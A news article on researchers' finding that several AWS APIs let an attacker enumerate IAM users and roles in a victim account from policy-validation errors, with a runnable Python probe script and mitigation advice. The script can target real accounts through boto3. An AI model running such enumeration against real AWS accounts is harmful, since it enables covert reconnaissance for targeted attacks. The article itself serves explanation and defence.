Identity & Access

Researchers Find Tens of AWS APIs Leaking Sensitive Data

Palo Alto Networks security researchers identified more than 20 Amazon Web Services (AWS) APIs that can be abused to obtain information such as Identity and Access Management (IAM) users and roles.

In total, the technique can be applied to 22 APIs across 16 different AWS services to obtain the roster of IAM users and roles in a target account, gain a view into the organization's internal structure, and use that information to launch targeted attacks against specific individuals.

According to the researchers, the attack works across all three AWS partitions (aws, aws-us-gov and aws-cn). Services whose APIs can be abused include Amazon Simple Storage Service (S3), AWS Key Management Service (KMS) and Amazon Simple Queue Service (SQS).

“The root cause of the issue is that the AWS backend proactively validates all the resource-based policies attached to resources such as Amazon Simple Storage Service (S3) buckets and customer-managed keys,” Palo Alto Networks explains.

Resource-based policies typically contain a Principal element that names the accounts, users or roles granted (or denied) access to the resource. When the policy is created or updated, the AWS backend checks that every principal it names actually exists: if the Principal references a nonexistent identity, the API call fails with an error, and if the identity exists, the call succeeds. An attacker who owns a resource in their own account can therefore attach policies naming candidate principals in a victim account and use the success or failure of each call to confirm which identities exist.

By repeatedly invoking the affected APIs with different candidate principals, an adversary can enumerate the targeted account's users and roles. What's more, the enumeration is invisible to the targeted account: the API calls and error messages are logged only in the "attacker's account where the resource policies are manipulated," the researchers note.
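To make the mechanism concrete, the following Python example is added here as an illustration; it is not code from the Palo Alto Networks research or from AWS. It builds a Deny-only resource policy naming a candidate principal ARN in the target account, submits it to an attacker-owned resource, and reads the outcome: acceptance means the identity exists, a MalformedPolicy error about an invalid principal means it does not, and anything else is inconclusive. The error code and message it matches on are assumptions to verify against a bucket you own; the account ID, the names, the bucket and the FakeBackend that stands in for the AWS validation step are constructed so the block runs offline. The real probe (s3_put_policy) uses boto3's put_bucket_policy and is only wired in when you pass a client.

```python
import json


class ProbeError(Exception):
    """Constructed stand-in for botocore.exceptions.ClientError with the same
    .response shape, so classify_probe() works unchanged against the real SDK."""

    def __init__(self, code, message):
        super().__init__(f"{code}: {message}")
        self.response = {"Error": {"Code": code, "Message": message}}


def principal_arn(account_id, kind, name, partition="aws"):
    """ARN of an IAM user or role in the target account; partition may be
    aws, aws-us-gov or aws-cn."""
    if kind not in ("user", "role"):
        raise ValueError(kind)
    return f"arn:{partition}:iam::{account_id}:{kind}/{name}"


def build_probe_policy(candidate_arn, resource_arn):
    """Resource-based policy naming the candidate principal. Effect is Deny so
    that a successful put grants the probed identity nothing."""
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "PrincipalProbe",
            "Effect": "Deny",
            "Principal": {"AWS": candidate_arn},
            "Action": "s3:GetObject",
            "Resource": resource_arn,
        }],
    }


def classify_probe(exc):
    """Map the outcome of a put-policy call to exists / missing / unknown.
    None (no exception) means the backend accepted the principal, so it exists.
    A MalformedPolicy* error mentioning an invalid principal means it does not
    (assumed S3 PutBucketPolicy behaviour). Anything else, e.g. throttling or
    an AccessDenied on the attacker side, is inconclusive."""
    if exc is None:
        return "exists"
    err = getattr(exc, "response", {}).get("Error", {})
    code, msg = err.get("Code", ""), err.get("Message", "")
    if code.startswith("MalformedPolicy") and "invalid principal" in msg.lower():
        return "missing"
    return "unknown"


def enumerate_identities(put_policy, account_id, names, resource_arn, partition="aws"):
    """Probe each candidate name as both a user and a role; return {arn: verdict}."""
    results = {}
    for name in names:
        for kind in ("user", "role"):
            arn = principal_arn(account_id, kind, name, partition)
            try:
                put_policy(build_probe_policy(arn, resource_arn))
                exc = None
            except Exception as e:  # ClientError from boto3, ProbeError in the demo
                exc = e
            results[arn] = classify_probe(exc)
    return results


def s3_put_policy(s3_client, bucket):
    """Real probe target: an attacker-owned bucket, via boto3's put_bucket_policy."""
    def put_policy(policy_doc):
        s3_client.put_bucket_policy(Bucket=bucket, Policy=json.dumps(policy_doc))
    return put_policy


class FakeBackend:
    """Constructed stand-in for the AWS validation step: accepts a policy only
    if every AWS principal it names is in EXISTING."""
    EXISTING = {
        "arn:aws:iam::123456789012:user/alice",
        "arn:aws:iam::123456789012:role/Deploy",
    }

    def put_policy(self, policy_doc):
        for stmt in policy_doc["Statement"]:
            if stmt["Principal"]["AWS"] not in self.EXISTING:
                raise ProbeError("MalformedPolicy", "Invalid principal in policy")


def demo():
    """Run a guessed wordlist against the constructed account; return confirmed ARNs."""
    verdicts = enumerate_identities(
        FakeBackend().put_policy, "123456789012", ["alice", "bob", "Deploy"],
        resource_arn="arn:aws:s3:::attacker-probe-bucket/*")
    return sorted(arn for arn, v in verdicts.items() if v == "exists")


if __name__ == "__main__":
    for arn in demo():
        print("confirmed:", arn)
```

Note where the evidence lands: every call above is made by the attacker's credentials against the attacker's bucket, so the CloudTrail entries and error responses appear only in the attacker's account, which is exactly why the targeted account sees nothing.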

Detection and prevention of such an attack are rather difficult: the probing leaves no trace in the targeted account, and the adversary is under no time constraint when performing reconnaissance against random or targeted AWS accounts.

The IAM security best practices Palo Alto Networks recommends for mitigating the issue are: remove inactive users and roles to reduce the attack surface; add random strings to user and role names so they are difficult to guess; log and monitor identity authentication activity; enforce two-factor authentication (2FA); and sign in through an identity provider and federation rather than with standalone IAM users.

“Good IAM security hygiene can still effectively mitigate the threats from this type of attack. Although it’s not possible to prevent an attacker from enumerating identities in AWS accounts, the enumeration can be made more difficult and you can monitor for suspicious activities taken after the reconnaissance,” the researchers note.

Related: AWS Network Firewall Now Generally Available

Related: AWS Fraud Detection Service Becomes Generally Available

Related: AWS Security Service ‘Amazon Detective’ Now Generally Available

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
